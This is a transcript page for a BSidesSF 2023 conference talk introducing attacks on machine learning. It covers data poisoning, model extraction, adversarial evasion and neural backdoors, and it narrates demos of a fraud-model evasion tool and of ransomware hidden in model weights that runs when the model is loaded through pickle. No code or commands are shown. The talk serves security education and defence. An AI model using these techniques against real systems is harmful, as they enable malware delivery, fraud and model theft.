Sleeping With One AI Open: An Introduction to Attacks Against Artificial Intelligence and Machine Learning

Name: Sleeping With One AI Open: An Introduction to Attacks Against Artificial Intelligence and Machine Learning
Uploaded: 2023-05-10
Duration: 51 min 44 s
Description: Sleeping With One AI Open: An Introduction to Attacks Against Artificial Intelligence and Machine Learning Eoin Wickens, Marta Janus AI-based solutions influence us and our society - often without our awareness - making decisions that can change the course of our lives. Despite the level of trust t

BSidesSF · 202351:44765 viewsPublished 2023-05Watch on YouTube ↗

Speakers

Eoin Wickens Marta Janus

Tags

CategoryTechnical

StyleTalk

Mentioned in this talk

Tools used

DALL-E Stable Diffusion

Service

Bing ChatGPT Google Bard Midjourney

About this talk

Sleeping With One AI Open: An Introduction to Attacks Against Artificial Intelligence and Machine Learning Eoin Wickens, Marta Janus AI-based solutions influence us and our society - often without our awareness - making decisions that can change the course of our lives. Despite the level of trust that we place in ML algorithms, these systems can be exploited. We present a taxonomy of attacks on ML and show how they work. https://bsidessf2023.sched.com/event/1Hztz/sleeping-with-one-ai-open-an-introduction-to-attacks-against-artificial-intelligence-and-machine-learning

Show transcript [en]

Hi everybody. Um, pleasure to meet you all and thanks for coming out. Great turnout. Um, my name is Owen Wickens. I'm a researcher here Sorry, and this is Marta Janus. We're both researchers in Hidden Layers basically ML research team. So, we look at ways of um, securing artificial intelligence systems, but part of that is also looking at how AI systems can be attacked. So, we're going to hit talk about the risks that AI systems face, how these systems can be attacked, and for what purpose. So, after a brief introduction to why AI is so important and how ubiquitous it's become, we'll look at the who, the why, the how, and then explain the classes of

attack focusing on some real-world applications, examples, and mitigation strategies. So, the last few months have been, you know, nothing short of revolutionary. I mean, everybody's Everybody's heard of ChatGPT now. My My grandparents are asking me about ChatGPT, and when that starts happening, when they know what you're looking at at work, that's kind of a big deal. So, you know, ChatGPT's really taken the world by storm in a lot of ways, but we're not really going to talk about that today, but, you know, it's just important to kind of highlight how AI is becoming so present and prevalent within our lives. You know, Microsoft has Bing, Google has Bard, albeit to varying levels of success, but you know, I think it's

taken us all by surprise how quickly this has become part of the the mainstream. But, it's not just LLMs, it's not just ChatGPT and the likes. It's also, you know, specialized image generation models, you know, such as DALL-E, Stable Diffusion, Midjourney, which have been redefining the creative sphere and, you know, allowing people with sentences to create incredible scenes and and and so on. And, you know, getting into some hot water with, you know, legal copyright issues at the same time, but, you know, it's it's easy to see that it's becoming the zeitgeist of the decade. So, you know, it can also be immensely helpful in both science and medical applications and such as drug discovery,

mathematics astronomy medical imaging and like pretty much anything that you can think of. And hopefully it'll lead us to many more discoveries and breakthroughs. But, and so these here are just some basically recent headlines that we've that we found, but in fact, AI has actually become part of our lives much before that as well. You know, like it's been used in like more kind of like evident applications such as self-driving cars, obviously, and you know, cybersecurity for things like spam, malware, intrusion detection, um, also in applications like biometric authentication, you know, your phone, Face ID, you know, e-commerce, financial forecasting, even when you apply for a loan, like it's all all the documents you send in are being approved by a

machine. And it's like quite interesting and amazing to be honest that, you know, ML has so much power in our lives that it influences nearly like I'd say a lot of the decisions that are made about us and for us during during the course of our day. But, with great power comes great responsibility, and we'll we'll dive into that later. So, first we're going to take a brief look at how AI works under the hood, and for that I'll pass you to Marta. Thank you.

All right. Let's start with um just some basic terminology that we will use throughout this presentation just to make sure that everybody's on the same page. So, um, sometimes there is a bit of confusion between artificial intelligence and machine learning. Some people use those terms uh interchangeably. Uh, there is a slight difference though. Artificial intelligence is a more generic term uh that um describes any system that has a the capacity of performing some actions that human perform. Or, in other words, it mimics human intelligence or human behavior. Now, machine learning is the technique that modern artificial intelligence uses to learn from the data and to improve itself. Uh, at the core of each machine learning solution lies

something that we call machine learning model, which is basically a decision-making system that is responsible for reading the input and producing um an output. So, a prediction or whatever this machine learning model is um providing. Why am I tapping the wrong side? Sorry for that. I think you're hitting space, so just hit hit this one. All right. Thank you. Um So, machine learning model is produced in um the process called training. Uh, so before before it can be used, it has to be trained. It's basically a results of running large amount of training data through some complex mathematical algorithms. Um, and um after the training, which sometimes takes more than one attempt, so the model has to be

retrained with different parameters in order to um actually be more accurate. After that process, we have something that we call the trained model, which can be then put into production. In other words, it can be made available to the end user. That is made through an UI or an API or any any kind of access that lets the user query the model and receive the predictions. Um, the input that the the model takes is can be anything really. Can be an image, can be a video, can be a a binary data, or more recently um a prompt, a text prompt like for that ChatGPT for example. And then um this data is processed by the machine

learning model to in order to produce an output, which can be a classification, a prediction, a real um real value number or or a text or an image like in case of large language models, it's going to be a text. In case of image generation model, it's going to be an image. So, that's basically how it works. It's a little bit like a a human brain. And um Most of common complex machine learning solutions use a technique called deep learning. There are other types of models as well, but we're not going to delve into it. We just want to um mention something that we will be mentioning later on. Um So, deep learning models are basically made

of layers of neurons, another reference to human brain. And each model contains an input layer with which receives the input from the user. It's not the exact input that the user provide. It's a vectorized input, so it's basically an image translated into some floating point values or a text based on the text is text translated to those floating point values that are understandable to our model. That's the input layer. Each um neural network model also contains an output layer, which produces the actual prediction or the output. And in between there is various number of so-called hidden layers, which are um responsible for the processing of of the information. So, all the magic takes place there.

Um, now um this technology is really powerful. It's a very impactful and it's very useful, but also it can be used against us. It can be exploited, it can be misused, or it can be used for malicious purposes. So, why why people could would like to abuse this technology and how? Uh well um the The answer to to the question who could abuse it is simple. We have our usual suspects here. First of all, cybercriminals who are actually attacking machine learning models not since today. It has been a good couple of years a good few years since first machine learning solutions appeared on the market where cybercriminals were already actively trying to mainly evade them.

So, like for example, spam detection models were one of the first to use um machine learning in in the space of security, and the cybercriminals circumvented them pretty quickly. That's actually an attack against a machine learning model. So, trying to evade it like evade detection of spam or malware, that's an attack. And we have it going on for many years already. Other Other people who one might want to exploit it are competitors. So, some people who don't want to spend time on my or money on training their own models, they can actually try to steal the model from their competitors in order to get a cheap advantage. And on top of that, we have also

sophisticated actors. For example, nation states that might use machine learning models for their nefarious purposes like misinformation, like um um manipulation of um of the public opinion and so on. Um The attackers can have various access to to the model Um, so in in case where the attackers have full access to the model that they attack, um including the training data and the parameters the model was trained with, we are talking about white box attack. Um now, this doesn't really happen often in the wild. It's something that belongs to the sphere of academic research mainly. And um yes, it's it's difficult to imagine attackers having this kind of information that is really sensitive and presumably really well protected.

But uh it can happen in case, for example, of insider threat or um third party um third party contractor who was tasked with training the model. This third party contractor can be actually malicious and and gain access to this information. Uh the attackers can also gain access to some of the information doing open source research or uh by doing a traditional um security breach. Um and um there are some there is some tooling that the attackers can use. Owen? Yeah, cheers. So, um adversarial ML is like largely been within the realm of academia for some time now. I think papers started first coming on the scene back in the early 2010s. Um I think the

preprint store uh not store but the preprint repository uh archive has or archive, if you pronounce it, um is uh I think up to about 4,000 adversarial ML papers now. So, it's it's it's expanded, but while it might seem that attacking ML models requires a PhD in data science or advanced statistics or something of the case, it's it's largely not the case anymore. And this is largely thanks to the the many free available attack frameworks, which can be used as, you know, uh pen testing and evaluation tools also uh or primarily, sorry, that have been released over the past couple years. So, some of the tools that we show here um implement these research-level attacks like I IBM's

adversarial robustness toolbox. Others then act as abstraction layers upon things like uh like like art, um which allow kind of like an ease of use. So, uh you can make it a bit more Metasploity, if you will. Um others then, you know, augment image uh generation or or text generation. So, AugLy for image uh manipulation, TextAttack for attacking text, Armory for looking at other different types of defenses, and so on. But what are the attack the consequences when one of these attacks take place? Well, attacking ML systems can be profitable for all kinds of adversaries. And you know, ML is on course to be integrated into almost every industry. I think there was a study, I can't

remember, was is it even CompTIA that said 86% of CEOs surveyed said that, you know, they they use ML as a valuable part of their uh you know, uh industry or their in within their company, sorry. Um you know, so there's little to no security measures or regulation around ML at the moment, although regulation is coming in. But you know, with any new technology, these things often you know, run ahead of us before we can catch up and implement security in its place. So, ML is kind of a little bit of a wild west at the minute, kind of in a almost a little bit of a parallel to kind of how, you know, antivirus was uh maybe

about 20-odd years ago. Um and you know, the the consequences can of such an attack will be, you know, quite different for different types of targets, obviously. But you know, you you might have something as as kind of benign as a denial of service. But you know, when it's a denial of service that uh has the capacity to injure a human being, you know, the the the the severity can be much higher. So, to categorize these types of attacks, we have to consider the goals of the attacker and uh the point in in within the ML life cycle or the ML development life cycle at which they strike. So, as we mentioned before, um by

attacking an ML system, the adversary will usually aim to do one of three things. They'll you know, attempt to alter the model's behavior. So, this could be uh to make it biased, to make it inaccurate, or even malicious in nature. It could be to bypass and evade the model. And this would be, for example, to trigger an incorrect classification or avoid detection. So, you know, if you think of like an antivirus model detecting malware, it would be coming up with a way of changing the malware so it's not, you know, detected as malware. So, it's classified as benign. Or, you know, or it will be to replicate the model itself. So, as Marta talked about

earlier, this we can actually steal the model entirely just by querying it. Um or, you know, if you can figure out enough of the training data coupled with this, you can create some pretty high high accuracy knockoffs. And and and even with this, you're able to do these things we call oracle attacks, which I'll explain a little bit later. So, in terms of timing, uh the attackers can target the learning algorithm in during the model training phase. And this is usually by poisoning the data um or altering the training algorithms directly. So, this requires access to the training data or access to the the training to the training process itself. And we'll we'll touch on this in

a short while, but this is quite important when you think of, you know, a static train-at-once model uh compared with a model that's learning continuously over time. And data poisoning can can be basically incorporated into a a model that's live. Um alternatively, the attackers are, you know uh if they're not able to basically get the the uh get to the uh you know, into the training phase, which they may not be. They may be able to hijack the model when it's in transit. You know, they could do things such as embed a backdoor uh kind of in a different context to what you're probably used to. What we kind of refer to this as a neural

backdoor, which acts almost like a skeleton key uh for the for the model. This is where you would have a, you know, a particular piece of information that will force the model into triggering a certain type of behavior. So, you know, again, we'll we'll rely on a mortgage approval model here for the same instance. You know, if if it had a particular postcode in, then it would say, "Okay, always approve to this postcode." And you know, the the adversary could sell that to a third party. You know, they could sell access to this, you know, and and this is this is how these things can be brought in. Now, also, we can embed traditional malware inside the model and deploy it

that way. So, we'll actually look at that towards the end of this presentation. And so, if attackers actually have no access to the training process or to the deployment, but only an ability to query the model, you know, via a REST API, which is super common, if not probably the biggest use case for a model, be it, you know, internal or external, they can still attack the model by performing what we call as an inference attack. So, inference is essentially used or inference attacks, I think we'll we'll be going to inference in a second. Yes. Oh, yeah, we'll we'll talk about inference in a second. But inference is basically where we can use evade correct classification. We can

understand what's going on inside the model to create things to, you know, bypass it and and so on. Or we can extract the whole model and and steal it, um which is, yeah, yeah, which we'll again talk about. So. Yeah, sorry. Uh back to you. Thank you. So, let's let's look um more in depth on the um at the poisoning attacks. Um Poisoning attacks um are basically the attacks where the attacker can poison the data set that the model is trained on in order to make the model inaccurate, biased, or giving mali- malicious outputs, for example. Uh so, um in this scenario pictured here, uh we have a vision recognition model um visual recognition model which uh

uh takes a picture and says what what's on that picture. And if the data set is poisoned enough, it can, for example, misclassify a picture of a cat as a turtle. That's a really benign scenario, really. But um uh with a little bit of imagination, we can, for example, think of security scanners that could misclassify a gun as something benign or other way around. And that that might have a profound consequences. Um In order to um poison uh the model, the attackers have to have um specific access to at least to the the training data. And in in some options like um uh in static or traditional uh machine learning uh scenario in which the model is

trained just once and deployed once, this is not as much of a risk. Now, uh most of the models that uh are surrounding us in everyday applications are uh trained on live data, on the data that user inputs, that user provides. So, um we call uh this uh online learning or continuous learning or adaptive learning. Um and in this case, the model is more adaptable to changes in user behavior, for example. It's more flexible and uh yeah, it's it's it's a really great thing to keep uh the model um the model's predictions accurate. But it's also a double-edged sword because the users don't have to provide uh uh an honest data. They can modify their

behaviors in a certain way, manipulate the data, and send uh a manipulated data to the model. And if there is enough of those users, the models can be skewed. So, uh those can be users or those can be even bots. Cybercriminals could come up with a huge networks of bots that are sending manipulated data to the model in order to um to change its behavior. Um and a um variant of online learning is federated learning. I think it uh it it's good to mention it just briefly um because it's used in many applications that are for example running on our phones, applications that are dealing with uh highly sensitive private data. So, federated learning was something

that um uh that is it's something that is supposed to um address the problem of privacy. Um although it's not uh perfect, but at some level it it does addresses it by um training the model on the user's device. So, the data that we input into the model doesn't go anywhere. It stays on our device and the model is trained on our device and then sent to the cloud to be merged with um with the global model. And in this way, for example, uh face recognition in Apple Photos works. So, that's why Apple says like we are not sharing this data this data stays on your phone. Uh it's um it's a great thing, obviously, because it um it attempts uh

to preserve the privacy even if it's not perfect. Well, nothing is perfect. But, it also opens up uh for uh to to attacks uh by uh by malicious actors who can, for example, manipulate the model the trained model on the device, which is then sent to be merged with the global model. And uh at the moment uh probably there is not much uh of um validation made on the data set that is coming from the user or on the the models that are going up to the cloud to be merged. So, in in this way uh attackers can also uh try to manipulate the model. Uh so, most um stark example of uh a crude attempt that

uh data poisoning is uh the Microsoft uh chatbot Tay, which was released in 2016 and lived how many hours or maybe a couple of days, I don't remember exactly right now, but it was shut down pretty quickly because users started sending um well, users just were were being users, basically. They were not even malicious. They were just interacting with the bot in a way which made the bot uh racist racist, biased, malicious, and uh obnoxious. And uh Microsoft had to take the bot down uh immediately and uh rethink their way of um training training the the chatbots. Now, uh with the the next generation of chatbots, which is GPT-4 chatbots, uh this is becoming also uh

a problem. And um we can already think of um of nation states or big um uh big um sophisticated adversaries training their own bots to be biased already or trying to influence the bots that are there to uh actually push their agenda, be it political or any any kind kind of agenda. So, this might become a real problem. Now, uh I'll give it back to Owen to talk about inference attacks. I knew we were talking about inference attacks. Cool. So, so we'll start first with the uh definition of inference. And inference is basically the process of yeah, as we say, running live data against the model. So, that think of this as, you know, a typical request or query to the

model. Uh you're inferring something or it's responding to you to, you know, what the data you put in. Um otherwise, in an adversarial ML context, we we use inference to understand what's going on inside the model. So, inferring what is happening inside there, you know, be it decision boundaries, be it the way it weights particular features that it passes in. Um we kind of use this as a data mining technique as the and as the the core of a lot of other other attacks that follow after. So, for most ML-based services, um the the user has to query the model um with with the live data. Um and to by doing this, or well, we can we can do

three things with this. We can infer the decision boundaries, which is essentially determining what what features will influence the classifier and get it to produce a particular outcome. We can reconstruct training data by doing things like membership set inference or membership inference. So, understanding if um you know, based on the output classification of the of the um from the model of a particular input, we can determine if if it was within the the training data set. And through this, we can start to build up an idea um of of how the model was made and then look to do something like recreating the model. Um so, recreating the model can be done in a couple ways. We can, you

know, recreate it from its training data set if we know enough about that. Uh or we can do something we call proxy modeling or surrogate modeling or also known as distillation, where we essentially take the we send a load of queries to the model over time and from those inputs and outputs, we end up creating and we can we can train up a model on that itself and create another model which uh can have a pretty high degree of accuracy. They maybe not surpassing it, but, you know, even sometimes defensive distillation can be used and it can make a model a bit more robust. Um but, you know, the thought of like having your model uh exposed um on the

endpoint and somebody can just come along and steal it is quite worrying, especially when you consider, you know, how much it costs in GPU uh these day GPU resources, how much it costs in gathering the training data in the first place, how much it costs to crunch the numbers and the data scientist to build it. So, you know, what's really interesting then is that researchers at the Max Planck Institute uh released a paper called Knockoff Nets. And in doing this, they were able to create a surrogate model or a proxy model or a distilled model. Sorry, I shouldn't have I shouldn't have said all three of the names. I should have just picked one. Um but, they were able to for as little

as $30 uh create a reasonable knockoff of the of their models uh of the of the target models. You know, so y- again, we think we think back to what Marta's saying about the different adversaries and, you know, their different motivations. You know, uh a foul playing competitor could maybe look to steal a model that is exposed and then retrain or train their own and then deploy it. Or, you know, cybercriminals may want to try and recreate it to create an oracle attack, which is essentially using your distilled model uh to as an oracle to understand if your attack will work. So, you attack your your own model that you just trained up offline and then you use

that attack against the model that you initially targeted and you can create attacks that have a really high degree or a much higher degree of success um without ever alerting the main person that the attack has happened. So, you know, and if we take this a bit further, uh stolen models could then be traded on underground forums so this in the same manner as other intellectual property or used to create unfiltered versions of chatbots. And, you know, researchers at Stanford, so I suppose just up the road from here, which only found out yesterday. Were able to recreate um uh the OpenAI I think one second, where is it now? Yeah, the OpenAI text-davinci model um by

fine-tuning Facebook or Meta's uh Llama model. And for I think as little as Yeah, they said cheaply. I think I've read something it was about 500 quid or something like that. But, yeah, anyway. So, they were able to do that and recreate OpenAI's uh code generation model pretty pretty quickly. And, you know, when you're when you're able to do that so cheap with, you know, open source stuff OpenAI is OpenAI's ChatGPT is obviously uh closed source largely and and and uh you know, I think but if you're able to recreate it with the weights of Llama and the just the outputs of of the ChatGPT model, you it's easy to see, you know, where these things can go.

So, uh yeah, so I have a quote here from uh AI researcher Eliezer Yudkowsky saying, "If you allow sufficient access to your AI model, you're effectively giving your crown jewels to competitors that can clone your model without all the hard work you did to build and fine-tune your data set." So, besides uh stealing the model itself, uh inference attacks can also help in model evasion attacks. And so, these are essentially when we uh bypass or mislead the model and, you know, we we go back and think of our malware analogy cuz we we used to be malware reverse engineers. Um so, we always think of it through that lens, but, you know, this is the act of modifying a

piece of malware so that it can appear as, you know, authoritatively benign to the classifier. Um it's also we can bypass content filters. We can bypass spam detection. We can bypass EDR, MDR, IDS, IPS, fraud detection. And, you know, I suppose you can read the other two bullet points. Um but, yeah. So, you know, it's pretty pretty pretty uh yeah. We can bypass models. Um so, maliciously crafted inputs to models are referred to as adversarial examples. And the purpose of an adversarial example is to uh you know, evade the correct classification. Um so, this is a picture of a cat here. And we just apply a little bit of noise uh to the to the cat and all of a sudden it's being

uh uh classified as a turtle with a 99% degree of accuracy. And it sounds a bit bizarre and probably looks a bit bizarre, but the the the image is almost imperceptible to the uh the changes are almost imperceptible to the human eye, but to the input classifier, it changes wildly. Um so, in order to create these adversarial examples, um the attacker basically perturbs the input in such a way that, you know, when the model classification of the input that the model the classification changes. So, you know, we we like there's even if we boil it down to like a super basic attack called a one-pixel attack, we can basically take a an image such as

our cat here. We can iteratively modify a single pixel and you know, try it using differential evolution and modify it with a you know, particular color and we can ultimately end up with an adversarial example that does this you know, drastic change in confidence with a single pixel and you know, we we don't have a demo of that in this in this deck, but it's it's pretty pretty mad to see Predator. Oh, sorry. So, somebody here. Um so, yeah. I mean like we we think of it in the single pixel sense there and you know, it sounds a bit benign, but you know, we if we scale it out to something that's you know, being used every day, we can see

an adversarial example here where these adversarial stickers were put on stop signs and what this ended up with is self-driving car not recognizing that this is a stop sign. Now, you or I can see pretty much that's a graffitied stop sign and a stop sign with a few patches on it, you know, but to image an image classification model this can completely change our interpretation. So, yeah. The possibilities are endless and they can have many many consequences. Now, we're going to try and just show a quick demo of a tool called Counterfeit here. Counterfeit is kind of an abstraction layer and ease of use abstraction layer that's kind of Metasploit-like like you'll see in a second that allows us to

one second. Basically conduct adversarial attacks very easy and very quickly. In fact, so quickly that I might not have enough time to speak over this at this demo as we go. So, what we have here is Counterfeit up and running. We're going to attack a credit fraud model that exists basically as a as a pre-packaged model with the Counterfeit uh demo. We can list the target. I might put that on a little higher setting cuz I think that's quite Okay, we'll try this. So, we can we can list the targets here. So, we can see that you know, we have our credit fraud model here. It's taking in tabular input. Next, we set our target to be the credit

fraud model. Yeah sorry. Not used to these cinema screens. Um so, then we can list the attacks. So, you can see there's tons of attacks bundled here with different frameworks. So, adversarial robustness toolbox, AugLy, and text attack. We have the different categories so, evasion, inference, etc. And you know, they use open box, closed box closed box terminology here as well as well as the input data type. So, for this attack we're going to select an attack called HopSkipJump which is basically an a query-efficient way of determining decision boundaries of a target model and creating an adversarial example. So, we say use HopSkipJump and then we hit run. And hey presto. So, yeah. We with this

attack we see this series of floating point numbers here. Now, this doesn't really mean much to us and it it but it means something to the model. Um but what this is basically is a way of conducting fraud against a credit card classification model. Um and yes, the the the model itself which is available on Kaggle has these numbers in as well and but they don't mean much to us because they've been de-anonymized but they've been used by I think they were given out by MasterCard and everything. So, this is like from a uh pretty reliable data set. Uh cool. Right. Get out of that and that is not what I wanted. Can we move this?

Where is it? Cool. Lovely stuff. Thank God for that. Uh we need to get the slides up again here.

Cool. So, I'll let Marta talk about model hijacking attacks if we can get the the notes up. Crap. Are you doing it? I'll have to just look at the slides. Yeah okay. Um all right. So, um uh we showed how um the model can be attacked by uh the means only of having the access to the input uh and the output of the model. So, if the attacker is able to uh basically query the model, they can perform inference attacks. They can if if the if the model is trained online uh on the user supplied data, the attackers can perform um data poisoning attacks. And the hijacking attacks require access to the model itself to the model file.

And uh even if this might sound like something that could be accessible only to uh like third-party malicious third-party contractor or an insider uh or requiring traditional security breach, nowadays many models are actually shipped together with the application. Uh for example, um our smartphone applications are uh often stored with the models themselves. So, on the app stores we can download the application, we can extract the model, perhaps hijack the model, and re-upload it to the app store. Uh another thing is um model zoos or model repositories. They are extremely popular right now. There are many of them and they have vast amount of different kind of pre-trained models and many companies are actually using those pre-trained models without

much of a verification in their solutions. So, they put those models in production which which can be really really risky because um those those repositories, they don't really have much of security checks. I mean, right now they are implementing them and and it's really good and it's really great to see that that the the industry is moving fast to catch up with with possible attack vectors. But still, they are limited and there is no model integrity verification. If we think of an executable file, most of the executables nowadays are signed. So, they have a digital signature that says that they are what they are and they come from a trusted source and they are were not tampered

with. We don't have such a thing for the models yet. That's really important thing to to ponder on. So, the attackers might have access to the models might actually uh those attacks those hijacking attacks might be a bit different than the inference attacks or poisoning attacks from that perspective. But there is a certain security risk here as well. Um So, um the first type of hijacking attack is actually an an attack against the uh the algorithm of the model itself and um this attack was demonstrated in academic circles. We didn't see anything right now in the wild that would use it. It requires quite a bit of technical knowledge. And um it might be also very difficult to

detect. So, in neural networks uh a backdoor can be injected into the model even into already trained model. So, the attacker doesn't require to have access to to the training process. It can modify the model already trained uh and add something that we call neural payload which is a basically a rogue layer of neurons that will tell the model to do something that the attacker wants the model to do. Um So, how the how such backdoor works, it has two basic components. One is the trigger which uh detects something that the attacker embedded in the image that will tell the model that to behave in a certain way. And if the trigger is detected, there is

a conditional module with this behavior that the attacker would like the model uh to to show. This could for example be used as over motioned before in loan approval applications. If the attacker fills in an application with a certain little information in it that will not be really recognizable to a human eye uh but the model will understand that this is the trigger, the model can say like yes, this application is approved even if it doesn't um it doesn't um fulfill all the requirements. And there are many other possible scenarios. For example, in military in um uh ballistic defense or in detection of detection of um rockets and ballistic missiles or in in authorization. So, the attacker could

actually gain access to to the resources that they shouldn't have access. So, that that's that's something that is really scary. We didn't see it happening in the wild yet, but it's also super difficult to detect. So, it doesn't matter It mean that those attacks are not happening. Uh but there are also simpler ways for cybercriminals, the usual cybercriminal, less sophisticated one, to actually abuse machine learning models. And um Uh machine learning models before being um put into production, they have to be serialized. So, put in a format that is understandable, that is possible to store them in. Uh and there are many serialization formats. Uh each um machine learning library has its own format or uses a couple of

different formats. And unfortunately, those were not really designed with security in mind. And many of them uh allow for um arbitrary code execution. So, that's another way in which that attacker can actually abuse machine learning model without attacking the technology itself, just using this technology as a a way forward to gain, for example, access to the system or perform a more traditional attack. Uh and a lot of a lot noise was made around um the pickle uh serialization format, which is a Python module. Um this is something that uh uh researchers a couple of years ago demonstrated that it's possible to run arbitrary uh malicious code from a a pickle file. Uh we tested it ourselves, and yes, it's

it's possible. It's easy. We will show you a demo later. And uh yeah um Python documentation clearly states that this is not something that should be used in production, that this is not something that we should be trusting, but still lots of models in uh in model zoos are pickle based. And uh we don't know who uploaded those models there and what they can actually um store. Uh another thing that can be done, which is also a bit of fun, is model steganography. Uh steganography, and the traditional version of steganography, is hiding messages inside a a picture, for example, uh which can't be seen. The picture is looks like it was not modified, but there is something inside it.

Also, malicious payloads can be stored in images like that, but they also can be stored in uh machine learning models. Uh so, this might be a bit um technical slide, but this is um inside of um a ResNet model. We see the data pkl file, which is uh a pickle, actually, a pickle serialized model structure file. And then we have a bunch of files in the data folder, which contain all the uh floating point numbers associated with the neural network. Uh So, if we open one of those files, what we see is basically floating point numbers. And uh in this way in the same way as with um uh st- uh traditional steganography, an attacker

could modify uh those floating point values in order to store a payload inside them. So, the attacker can modify as little as three bits, three least significant bits of all of those floating point numbers, to store a payload inside the model without making the model less accurate. The model will be s- can can be totally the same in accuracy, maybe with super slight change, but totally invisible to the human eye. Uh in this example, we we tried to change 16 bytes, uh least significant bytes, overflowed. It gives um a a slight difference, not a much of a difference. And uh in in case of some models, that might be enough. But yeah, it's possible to do it with just three

bits, and machine learning models nowadays are quite big, so even if it's just three bits of each of the float values, we would should be able to inject quite a big payloads inside those models. Um I will Here we have a demo. It will be a bit funny. How? Try to do that. All right, I'm now an expert. I'm now an expert on cinema screens. Uh let's put it in um Yeah. Now I'll go there. Uh Yeah, yeah, totally agree with it. Cool. I'll I'll start it. And there's full screen, full screen. Perfect. I'll just start it again as well, so. Yeah, uh pause it. Pause it for a moment. Sorry, I thought I did. Uh

Good. All right. This is more difficult than it looks, I'll tell you that. It would be easier if we had it there as well. It's not letting me full screen it. It's not letting me full screen it. This might have to do. Okay. Do you want to go? So um Is it visible? Uh Jeez. Man. There. There we go. Sweet. you just go to the beginning and stop it for a bit. I'll just I'll just hold it. All right. So um To showcase a scenario in which um typical cybercriminal could use machine learning model in order to gain foothold in a victim system. Uh we developed a couple of scripts. It's not nothing super sophisticated. So, we have one

script that will embed the a payload, which we chose Quantum ransomware for, uh just to showcase uh but this the scenario, but it could be anything really any any malware. And then another script to uh inject this payload uh inside the the machine learning neural networks using the steganography technique that uh we showed before. And uh on top of that, we have one Python script that will decode this payload from the steganography um embedded um bits, reconstruct it, uh and run it. And uh finally, one a script that will inject this uh previous script into memory. So, it's just four scripts. It's nothing very complicated, and

Yeah, is it playing or It's paused again. All right. So, yeah, just to show that this the scripts are not really complicated. Uh a really quick run through them. Um not going to go into details, we don't have much time, but uh yeah. Those are scripts. All of them are, yeah, 50, 60 lines of code, maybe 100 with uh with uh comments. So, that's not really sophisticated. So, let's see. We have a ResNet model, original ResNet model, we downloaded it from the internet. Check We checked the checksum so to see that those this model was not tampered with. That's the correct checksum that is shown now. After. Now we embed our payload inside a shellcode.

And we get the payload.py py script, which is basically injecting this shellcode into the memory.

And now we run our torch steganography script in order to inject that payload.py inside the model neurons.

We found a layer big enough for it. Embedded it. Now we can see that the the hash of the file changed. We can't It's not going to be any visual change in the model, just the hash changed. And now we What we need to do is to inject our script, which will decode the payload, inside the uh ResNet model using the serialization vulnerability. So, now if we open the ResNet model, we can see that the script in plain text there. It's uh yeah, it's crude. We could obviously obfuscate it, but for reason of this demo, it's totally enough. And last thing to do is see if that model will be loaded to the memory and

what it is going to happen. So, we run Python, import torch, torch.load, uh give the path to the model. And voila, the system is owned.

Thank you. Yeah, that's uh the ransomware readme note. All right. Okay. Ooh. Okay, if we go back up here.

Oh, there we go. All right, we need to breeze through the last of the slides, really. Right. We'll just We'll just go over this. We need to breeze. We don't have time. Okay.

So, yeah, just to summarize uh the attacker could use those two techniques to actually perform for example supply chain attacks or deploy malware or ransomware or get a foothold inside a victim system. And this is not just proof of concept research. We actually are finding daily right now malicious files, malicious pickles, but not only pickles, also Keras models in in VirusTotal or in those repository model repositories. So these things are happening already. They are crude attempts right now, but they are happening. So the rest is just closing notes. Yeah. So I think we all know the you know stories of AI gone rogue as Skynet, the Cylons to name a few. And but you know,

we're not really there yet and I think the the we really need to worry about us attacking AI rather than AI attacking us just at this minute because it's in everything, it's ubiquitous. You know, it's being introduced into every product you know about and I can guarantee almost every product at RSA is going to be talking about their AI in their product. And so yeah, it's just Okay so Correct. We don't have much time. This are some techniques to actually improve the security of machine learning models. So there are basically two approaches. One is to make the model more robust. It's a valid approach. And the other one is to monitor the input and output to the model to see actually

uh suspicious traffic. And I think we should combine both of those approaches together with definitely model signing, model integrity checks, and scanning for malware. We should just be aware that all those threats exist. Okay, that's it for today. We are out of time. Thank you. Thank you for coming.

Sleeping With One AI Open: An Introduction to Attacks Against Artificial Intelligence and Machine Learning

Related talks